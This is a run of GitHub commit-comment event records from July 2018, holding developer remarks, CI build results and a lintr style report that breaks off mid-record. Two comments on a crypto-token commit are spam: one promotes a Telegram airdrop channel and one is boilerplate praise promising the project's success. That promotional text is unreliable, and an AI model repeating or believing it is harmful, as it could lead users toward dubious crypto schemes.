{"id":"8013364271","type":"CommitCommentEvent","actor":{"login":"muhammad-younis"},"repo":{"name":"Nitish-Squad/CookingApp"},"payload":{"comment":{"id":29821633,"position":null,"line":null,"path":null,"commit_id":"213b7cfbe5cecfc41f183c161bd2b395cd74166a","created_at":"2018-07-24T23:48:27Z","updated_at":"2018-07-24T23:48:27Z","author_association":"NONE","body":"deleted API Key that was here on Google, will no longer service requests. Will work when a valid api key is added"}},"created_at":"2018-07-24T23:48:27Z"}
{"id":"8013365228","type":"CommitCommentEvent","actor":{"login":"ShredwardNorton"},"repo":{"name":"ShredwardNorton/Work"},"payload":{"comment":{"id":29821635,"position":null,"line":null,"path":null,"commit_id":"04de4091ed3ec065e15c1f2eb7babda2837ae528","created_at":"2018-07-24T23:48:46Z","updated_at":"2018-07-24T23:48:46Z","author_association":"OWNER","body":"looking good"}},"created_at":"2018-07-24T23:48:46Z"}
{"id":"8013374685","type":"CommitCommentEvent","actor":{"login":"pouchak"},"repo":{"name":"pouchak/rainbows-end-api"},"payload":{"comment":{"id":29821655,"position":null,"line":null,"path":null,"commit_id":"609456b0dd527195541a9fe4ebe5d5aa54acb504","created_at":"2018-07-24T23:52:09Z","updated_at":"2018-07-24T23:52:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add README](https://trello.com/c/5g0teZlp/21-add-readme)"}},"created_at":"2018-07-24T23:52:09Z"}
{"id":"8013375088","type":"CommitCommentEvent","actor":{"login":"nichpass"},"repo":{"name":"nichpass/AI_Projects"},"payload":{"comment":{"id":29821656,"position":null,"line":null,"path":null,"commit_id":"b44e21d21b4adf088baaa23badda72fd9bc2195c","created_at":"2018-07-24T23:52:17Z","updated_at":"2018-07-24T23:52:17Z","author_association":"OWNER","body":"basic neural network made with numpy using mini-batch gradient descent"}},"created_at":"2018-07-24T23:52:17Z"}
{"id":"8013377698","type":"CommitCommentEvent","actor":{"login":"sirathashimi"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29821663,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T23:53:13Z","updated_at":"2018-07-24T23:53:13Z","author_association":"NONE","body":"Keep joining my telegram for the best airdrop alerts!!\nhttps://t.me/highpayoutairdrops\n\nOn Tue, Jul 24, 2018 at 7:42 PM, Ramadhoni Bahari <notifications@github.com>\nwrote:\n\n> Nice\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29821576>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am4jXSALKHuJxX43IihS98xSMWtYiKysks5uJ7DTgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-24T23:53:13Z"}
{"id":"8013380269","type":"CommitCommentEvent","actor":{"login":"Stanzilla"},"repo":{"name":"InfusOnWoW/WeakAuras2"},"payload":{"comment":{"id":29821672,"position":6,"line":1488,"path":"WeakAuras/Types.lua","commit_id":"1d077f4788e1d778f71f886bb70a56be65406fcb","created_at":"2018-07-24T23:54:13Z","updated_at":"2018-07-24T23:54:13Z","author_association":"NONE","body":"C_ChallengeMode.GetAffixInfo() returns the localized name"}},"created_at":"2018-07-24T23:54:13Z"}
{"id":"8013380752","type":"CommitCommentEvent","actor":{"login":"SandraSanina"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29821675,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T23:54:23Z","updated_at":"2018-07-24T23:54:23Z","author_association":"NONE","body":"Nice project that grows every day and will be successful without a doubt, take time to participate in the development of the project. Currently meets all modern requirements and has a large number of advantages! Go and get acquainted with the project. I wish the project further growth and achievement of the set tasks.\r\n"}},"created_at":"2018-07-24T23:54:23Z"}
{"id":"8013382440","type":"CommitCommentEvent","actor":{"login":"timmyc"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":29821680,"position":5,"line":238,"path":"client/my-sites/stats/controller.jsx","commit_id":"daeb52adb59fe88aa150841d4a675d5246bc976f","created_at":"2018-07-24T23:55:00Z","updated_at":"2018-07-24T23:55:00Z","author_association":"MEMBER","body":"⭐️ nice fix!"}},"created_at":"2018-07-24T23:55:00Z"}
{"id":"8013383385","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29821686,"position":38,"line":38,"path":"subprojects/docs/src/docs/userguide/userguide.adoc","commit_id":"ec31973af72608ef4527d9d6e2f37d047969ff9b","created_at":"2018-07-24T23:55:19Z","updated_at":"2018-07-24T23:55:19Z","author_association":"MEMBER","body":"Fixed now, thanks"}},"created_at":"2018-07-24T23:55:19Z"}
{"id":"8013384894","type":"CommitCommentEvent","actor":{"login":"eriwen"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29821691,"position":5,"line":16,"path":"subprojects/docs/src/docs/userguide/working_with_files.adoc","commit_id":"f0faeeeb114b162b365e4eb6acd6cd42e956c46b","created_at":"2018-07-24T23:55:50Z","updated_at":"2018-07-24T23:55:50Z","author_association":"MEMBER","body":"Ok, thanks."}},"created_at":"2018-07-24T23:55:50Z"}
{"id":"8013396460","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29821717,"position":null,"line":null,"path":null,"commit_id":"85774f230b3d28f6b306e8e0a279a95af6cb82de","created_at":"2018-07-24T23:59:57Z","updated_at":"2018-07-24T23:59:57Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - i386-Windows-7-VisualStudio-14: OK (2943 of 2944 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-24T23:59:57Z"}
{"id":"8007528657","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29808334,"position":null,"line":null,"path":null,"commit_id":"fa7186d385c36d56bbda926333e5384ab8f4d512","created_at":"2018-07-24T03:00:05Z","updated_at":"2018-07-24T03:00:05Z","author_association":"CONTRIBUTOR","body":"generating inf coins on someone and yourself then giving them inf coins will set the amounts of both yourself and them to 0 instead of NaN now\r\ntested"}},"created_at":"2018-07-24T03:00:05Z"}
{"id":"8007529620","type":"CommitCommentEvent","actor":{"login":"josephfrazier"},"repo":{"name":"josephfrazier/react-dropzone"},"payload":{"comment":{"id":29808339,"position":null,"line":null,"path":null,"commit_id":"1bd2557a3ff03bab62483dd8c97a380d91ed732a","created_at":"2018-07-24T03:00:22Z","updated_at":"2018-07-24T03:00:22Z","author_association":"OWNER","body":"from https://github.com/react-dropzone/react-dropzone/pull/628"}},"created_at":"2018-07-24T03:00:22Z"}
{"id":"8007532511","type":"CommitCommentEvent","actor":{"login":"strattondevtool"},"repo":{"name":"strattondevtool/_sw_user_int_"},"payload":{"comment":{"id":29808346,"position":null,"line":null,"path":null,"commit_id":"75c267e5117f0d3e089cef5532b10da0a1514232","created_at":"2018-07-24T03:01:23Z","updated_at":"2018-07-24T03:01:23Z","author_association":"OWNER","body":"> **Abilidad woooh**"}},"created_at":"2018-07-24T03:01:23Z"}
{"id":"8007533479","type":"CommitCommentEvent","actor":{"login":"lvyijin"},"repo":{"name":"lvyijin/blog"},"payload":{"comment":{"id":29808347,"position":null,"line":null,"path":null,"commit_id":"1b3f3da4ea8791592b268e7eccfa09ba5b46ab1d","created_at":"2018-07-24T03:01:44Z","updated_at":"2018-07-24T03:01:44Z","author_association":"OWNER","body":"Created by group 10"}},"created_at":"2018-07-24T03:01:44Z"}
{"id":"8007535082","type":"CommitCommentEvent","actor":{"login":"CMasco"},"repo":{"name":"iceyferrara/bettors_delight"},"payload":{"comment":{"id":29808348,"position":null,"line":null,"path":null,"commit_id":"16df292146d0eca3bc366ed345b5a9e0e125b5e7","created_at":"2018-07-24T03:02:17Z","updated_at":"2018-07-24T03:02:17Z","author_association":"COLLABORATOR","body":"Tried to fix up the startBet function, also cleaned up some other stuff."}},"created_at":"2018-07-24T03:02:17Z"}
{"id":"8007539983","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29808356,"position":null,"line":null,"path":null,"commit_id":"e0c70265a13f0faa77da72bf933567345954ab26","created_at":"2018-07-24T03:04:06Z","updated_at":"2018-07-24T03:04:06Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.247`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/247) :tada:"}},"created_at":"2018-07-24T03:04:06Z"}
{"id":"8007540167","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"creativecommons/policies"},"payload":{"comment":{"id":29808358,"position":null,"line":null,"path":null,"commit_id":"779b2a65ac8a286107a9a30ea09e4499c5cd9bd8","created_at":"2018-07-24T03:04:09Z","updated_at":"2018-07-24T03:04:09Z","author_association":"NONE","body":"779b2a6"}},"created_at":"2018-07-24T03:04:09Z"}
{"id":"8007540387","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29808359,"position":null,"line":null,"path":null,"commit_id":"5f2381dfbe2ab5800607068318c7e51f944c88e6","created_at":"2018-07-24T03:04:13Z","updated_at":"2018-07-24T03:04:13Z","author_association":"COLLABORATOR","body":"- Action type added: `OVERLAY_CALL_PRIVATE_CHANNEL`\r\n\r\n## New strings\r\n- `OVERLAY_PRIVATE_CHANNELS_EMPTY_STATE: \"Nope, no direct messages here.\"`\r\n- `OVERLAY_CALLS_HEADER: \"Start a Call\"`\r\n- `SEARCH_FOR_FRIEND_OR_GROUP: \"Search for a friend or group\"`"}},"created_at":"2018-07-24T03:04:13Z"}
{"id":"8007543702","type":"CommitCommentEvent","actor":{"login":"jeffrey6068"},"repo":{"name":"jeffrey6068/leaning"},"payload":{"comment":{"id":29808363,"position":null,"line":null,"path":null,"commit_id":"bce760e4cc9a6b78a8da9e9d852d0db9848feaf6","created_at":"2018-07-24T03:05:18Z","updated_at":"2018-07-24T03:05:18Z","author_association":"OWNER","body":"修改"}},"created_at":"2018-07-24T03:05:18Z"}
{"id":"8007547313","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29808369,"position":null,"line":null,"path":null,"commit_id":"e0c70265a13f0faa77da72bf933567345954ab26","created_at":"2018-07-24T03:06:37Z","updated_at":"2018-07-24T03:06:37Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.374`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/407431786) :tada:"}},"created_at":"2018-07-24T03:06:37Z"}
{"id":"8007551164","type":"CommitCommentEvent","actor":{"login":"vegeta897"},"repo":{"name":"vegeta897/d-zone"},"payload":{"comment":{"id":29808374,"position":5,"line":9,"path":"web/index.html","commit_id":"5bbaa241873dbee39724ab6ae7b2948a30359df3","created_at":"2018-07-24T03:08:01Z","updated_at":"2018-07-24T03:08:01Z","author_association":"OWNER","body":"\"/path/to/favicon-196.png\" 🤔 "}},"created_at":"2018-07-24T03:08:01Z"}
{"id":"8007555250","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29808378,"position":null,"line":null,"path":null,"commit_id":"5b35cd7251e2238227e1ffdee2dcc14777757d52","created_at":"2018-07-24T03:09:34Z","updated_at":"2018-07-24T03:09:34Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2984 of 2984 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-24T03:09:34Z"}
{"id":"8007557006","type":"CommitCommentEvent","actor":{"login":"hll5239"},"repo":{"name":"hll5239/jbean"},"payload":{"comment":{"id":29808380,"position":null,"line":null,"path":null,"commit_id":"3c593b8d2e6ba21d8b0300f0e25dafcbdd6dc1ad","created_at":"2018-07-24T03:10:14Z","updated_at":"2018-07-24T03:10:14Z","author_association":"OWNER","body":"gkgkgkgk\r\ndkgkgkgkdk"}},"created_at":"2018-07-24T03:10:14Z"}
{"id":"8007560216","type":"CommitCommentEvent","actor":{"login":"Eduard0303"},"repo":{"name":"Eduard0303/eARL"},"payload":{"comment":{"id":29808385,"position":null,"line":null,"path":null,"commit_id":"273a42b40bf6ab10519e03c19ad20a341fa96371","created_at":"2018-07-24T03:11:27Z","updated_at":"2018-07-24T03:11:27Z","author_association":"OWNER","body":"nice"}},"created_at":"2018-07-24T03:11:27Z"}
{"id":"8007560821","type":"CommitCommentEvent","actor":{"login":"Eduard0303"},"repo":{"name":"Eduard0303/eARL"},"payload":{"comment":{"id":29808387,"position":null,"line":null,"path":null,"commit_id":"273a42b40bf6ab10519e03c19ad20a341fa96371","created_at":"2018-07-24T03:11:40Z","updated_at":"2018-07-24T03:11:40Z","author_association":"OWNER","body":"good\r\n"}},"created_at":"2018-07-24T03:11:40Z"}
{"id":"8007564932","type":"CommitCommentEvent","actor":{"login":"larshp"},"repo":{"name":"JohannesKonings/ABAP-Swagger"},"payload":{"comment":{"id":29808392,"position":null,"line":null,"path":null,"commit_id":"4d88735c80c30f600655292d12bed5eaba1b604a","created_at":"2018-07-24T03:13:07Z","updated_at":"2018-07-24T03:13:07Z","author_association":"NONE","body":"I enabled the app instead, https://github.com/apps/abaplint \r\n\r\nhowever, users have to be part of the developer program to run the trigger the checks API"}},"created_at":"2018-07-24T03:13:07Z"}
{"id":"8007566556","type":"CommitCommentEvent","actor":{"login":"hayea"},"repo":{"name":"hayea/saberTestSDK"},"payload":{"comment":{"id":29808395,"position":null,"line":null,"path":null,"commit_id":"5bf78f64ee012bfcb68072764cd1d3b63df8b7f0","created_at":"2018-07-24T03:13:41Z","updated_at":"2018-07-24T03:13:41Z","author_association":"OWNER","body":"hahaha"}},"created_at":"2018-07-24T03:13:41Z"}
{"id":"8007569972","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29808399,"position":null,"line":null,"path":null,"commit_id":"5b35cd7251e2238227e1ffdee2dcc14777757d52","created_at":"2018-07-24T03:14:55Z","updated_at":"2018-07-24T03:14:55Z","author_association":"NONE","body":"#6750-Crash-when-no-control-zone-name-is-specified-for-Load-control-in-AirloopHVACUnitarySystem (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b35cd7251e2238227e1ffdee2dcc14777757d52-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T03:14:55Z"}
{"id":"8007570136","type":"CommitCommentEvent","actor":{"login":"js1688"},"repo":{"name":"350078238/cat"},"payload":{"comment":{"id":29808400,"position":null,"line":null,"path":null,"commit_id":"25de25e3568a65c1cadbf37f914a5d441dfa0ff6","created_at":"2018-07-24T03:14:59Z","updated_at":"2018-07-24T03:14:59Z","author_association":"NONE","body":"我已经提交了修复已知bug的代码,\b在README.md中会记录完整的项目动态。"}},"created_at":"2018-07-24T03:14:59Z"}
{"id":"8007572588","type":"CommitCommentEvent","actor":{"login":"thomas66690801"},"repo":{"name":"thomas66690801/git_test"},"payload":{"comment":{"id":29808407,"position":null,"line":null,"path":null,"commit_id":"343fe4c13af5390636ffdc40e730a878ca34a9ba","created_at":"2018-07-24T03:15:50Z","updated_at":"2018-07-24T03:15:50Z","author_association":"OWNER","body":"there should be an addition text \"hello world\" here."}},"created_at":"2018-07-24T03:15:50Z"}
{"id":"8007577084","type":"CommitCommentEvent","actor":{"login":"alecsander-tf"},"repo":{"name":"alecsander-tf/Estudo"},"payload":{"comment":{"id":29808410,"position":5,"line":55,"path":"EstudoConsole/Unicamp/Lista_1/Classes/Questao_5/Vetor.cs","commit_id":"8f588a20a4652d2141750e2a7b753ed9ce5c9e75","created_at":"2018-07-24T03:17:32Z","updated_at":"2018-07-24T03:17:32Z","author_association":"OWNER","body":"Método está sobrescrito em classe da **Questão 6**"}},"created_at":"2018-07-24T03:17:32Z"}
{"id":"8007577390","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29808411,"position":null,"line":null,"path":null,"commit_id":"351fbf76cd361215d3affeab7a9adf4d38c937dd","created_at":"2018-07-24T03:17:38Z","updated_at":"2018-07-24T03:17:38Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/351fbf76cd361215d3affeab7a9adf4d38c937dd/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* 